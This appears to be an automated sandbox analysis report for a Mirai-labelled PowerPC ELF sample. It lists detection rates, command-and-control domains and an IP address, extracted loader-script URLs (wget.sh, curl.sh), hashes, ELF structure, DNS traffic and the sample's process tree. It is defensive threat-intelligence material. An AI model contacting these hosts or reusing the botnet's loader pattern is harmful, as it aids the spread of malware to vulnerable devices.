Source       Detection  Scanner        Label
rep.ppc.elf  50%        Virustotal
rep.ppc.elf  47%        ReversingLabs  Linux.Exploit.Mirai
rep.ppc.elf  100%       Avira          EXP/ELF.Mirai.W
                No Antivirus matches


Name                          IP             Active   Malicious  Antivirus Detection  Reputation
cuttiecats.ru                 45.135.194.73  true     false                           high
qittler.ru. [malformed]       unknown        unknown  false                           high
cuttiecats.ru. [malformed]    unknown        unknown  false                           high
cat-are-here.ru. [malformed]  unknown        unknown  false                           high
mykittler.ru. [malformed]     unknown        unknown  false                           high
polizei.su. [malformed]       unknown        unknown  false                           high
kittlez.ru. [malformed]       unknown        unknown  false                           high
kittlerer.ru. [malformed]     unknown        unknown  false                           high
Name             Source       Malicious  Antivirus Detection  Reputation
http:///wget.sh  rep.ppc.elf  false                           high
http:///curl.sh  rep.ppc.elf  false                           high
Match          Associated Sample Name / URL  Detection  Threat Name  Context
cuttiecats.ru  mpsl.elf                      malicious  Mirai        185.93.89.106
               rep.m68k.elf                  malicious  Mirai        185.93.89.106
               mips.elf                      malicious  Mirai        185.93.89.106
                                    No created / dropped files found
                                    File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                    Entropy (8bit):6.372680221437675
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:rep.ppc.elf
                                    File size:93'112 bytes
                                    MD5:e9082b6cc402fc736c9193d14ae6d5f4
                                    SHA1:7778718ba1f24d948a6e8ac4cc1c54bf31722ee6
                                    SHA256:a187c42abbd1f889f24e082a5b436a614d09bfea86271e5bfcae1a08b9d4381a
                                    SHA512:6dbf5955955139c2b9035e883fe39f1dc0ccd8ce827875a7f840ee0cde06e064800d741326cb6cca65290fd647606747db9326cc603f64eef355b6b4d4d5dd25
                                    SSDEEP:1536:T0InRoDdlHQGD0Izw+uG8rFrnruHn6O8QhR15iiBbtiCKkRQYD:T0AA/i3rJryV1EiviCKXYD
                                    TLSH:11934B4272040A33D99305B4363F1BF0A3B7A65032E1F287644EBB565DF6E33598AF99
                                    File Content Preview:.ELF...........................4..i......4. ...(......................f...f...............f...f...f.......4p........dt.Q.............................!..|......$H...H.4q...$8!. |...N.. .!..|.......?.........i...../...@..\?.....f..+../...A..$8...})....f.N..

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, big endian
                                    Version:1 (current)
                                    Machine:PowerPC
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:UNIX - System V
                                    ABI Version:0
                                    Entry Point Address:0x100001f0
                                    Flags:0x0
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:3
                                    Section Header Offset:92632
                                    Section Header Size:40
                                    Number of Section Headers:12
                                    Header String Table Index:11
Name       Type      Address     Offset   Size     EntSize  Flags  Flags Description  Link  Info  Align
           NULL      0x0         0x0      0x0      0x0      0x0                       0     0     0
.init      PROGBITS  0x10000094  0x94     0x24     0x0      0x6    AX                 0     0     4
.text      PROGBITS  0x100000b8  0xb8     0x134c8  0x0      0x6    AX                 0     0     4
.fini      PROGBITS  0x10013580  0x13580  0x20     0x0      0x6    AX                 0     0     4
.rodata    PROGBITS  0x100135a0  0x135a0  0x3110   0x0      0x2    A                  0     0     8
.ctors     PROGBITS  0x100266b4  0x166b4  0x8      0x0      0x3    WA                 0     0     4
.dtors     PROGBITS  0x100266bc  0x166bc  0x8      0x0      0x3    WA                 0     0     4
.data      PROGBITS  0x100266c8  0x166c8  0x280    0x0      0x3    WA                 0     0     8
.sdata     PROGBITS  0x10026948  0x16948  0x44     0x0      0x3    WA                 0     0     4
.sbss      NOBITS    0x1002698c  0x1698c  0x6c     0x0      0x3    WA                 0     0     4
.bss       NOBITS    0x100269f8  0x1698c  0x312c   0x0      0x3    WA                 0     0     4
.shstrtab  STRTAB    0x0         0x1698c  0x4b     0x0      0x0                       0     0     1
Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align    Prog Interpreter  Section Mappings
LOAD       0x0      0x10000000       0x10000000        0x166b0    0x166b0      6.4082   0x5    R E                0x10000                    .init .text .fini .rodata
LOAD       0x166b4  0x100266b4       0x100266b4        0x2d8      0x3470       1.7242   0x6    RW                 0x10000                    .ctors .dtors .data .sdata .sbss .bss
GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x4


                                    • Total Packets: 84
                                    • 34411 undefined
                                    • 53 (DNS)
                                    • 23 (Telnet)
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
Apr 1, 2025 09:41:11.796120882 CEST  192.168.2.13  8.8.8.8  0xfb98    Standard query (0)  cuttiecats.ru                 A (IP address)  IN (0x0001)  false
Apr 1, 2025 09:41:23.078249931 CEST  192.168.2.13  8.8.8.8  0x6b92    Standard query (0)  cuttiecats.ru                 A (IP address)  IN (0x0001)  false
Apr 1, 2025 09:41:34.181962967 CEST  192.168.2.13  8.8.8.8  0x9dfa    Standard query (0)  kittlez.ru. [malformed]       256             435          false
Apr 1, 2025 09:41:50.195221901 CEST  192.168.2.13  8.8.8.8  0xfe42    Standard query (0)  qittler.ru. [malformed]       256             451          false
Apr 1, 2025 09:42:06.211024046 CEST  192.168.2.13  8.8.8.8  0xa92d    Standard query (0)  polizei.su. [malformed]       256             467          false
Apr 1, 2025 09:42:22.227586031 CEST  192.168.2.13  8.8.8.8  0x1af9    Standard query (0)  cuttiecats.ru. [malformed]    256             483          false
Apr 1, 2025 09:42:38.247018099 CEST  192.168.2.13  8.8.8.8  0x9cfa    Standard query (0)  mykittler.ru. [malformed]     256             499          false
Apr 1, 2025 09:42:54.259001970 CEST  192.168.2.13  8.8.8.8  0x266     Standard query (0)  kittlerer.ru. [malformed]     256             259          false
Apr 1, 2025 09:43:10.275408983 CEST  192.168.2.13  8.8.8.8  0x20b3    Standard query (0)  cat-are-here.ru. [malformed]  256             275          false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
Apr 1, 2025 09:41:11.970853090 CEST  8.8.8.8    192.168.2.13  0xfb98    No error (0)  cuttiecats.ru         45.135.194.73  A (IP address)  IN (0x0001)  false
Apr 1, 2025 09:41:23.172991037 CEST  8.8.8.8    192.168.2.13  0x6b92    No error (0)  cuttiecats.ru         45.135.194.73  A (IP address)  IN (0x0001)  false

                                    System Behavior

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:/tmp/rep.ppc.elf
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/rm
                                    Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4
                                    File size:72056 bytes
                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfwm4
                                    Arguments:xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
                                    File size:420424 bytes
                                    MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfdesktop
                                    Arguments:xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
                                    File size:473520 bytes
                                    MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-panel
                                    Arguments:xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
                                    File size:375768 bytes
                                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfwm4
                                    Arguments:xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
                                    File size:420424 bytes
                                    MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfdesktop
                                    Arguments:xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
                                    File size:473520 bytes
                                    MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:12
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-panel
                                    Arguments:xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
                                    File size:375768 bytes
                                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                    Start time (UTC):07:41:21
                                    Start date (UTC):01/04/2025
                                    Path:/usr/lib/systemd/systemd
                                    Arguments:-
                                    File size:1620224 bytes
                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                    Start time (UTC):07:41:21
                                    Start date (UTC):01/04/2025
                                    Path:/lib/systemd/systemd-user-runtime-dir
                                    Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                    File size:22672 bytes
                                    MD5 hash:d55f4b0847f88131dbcfb07435178e54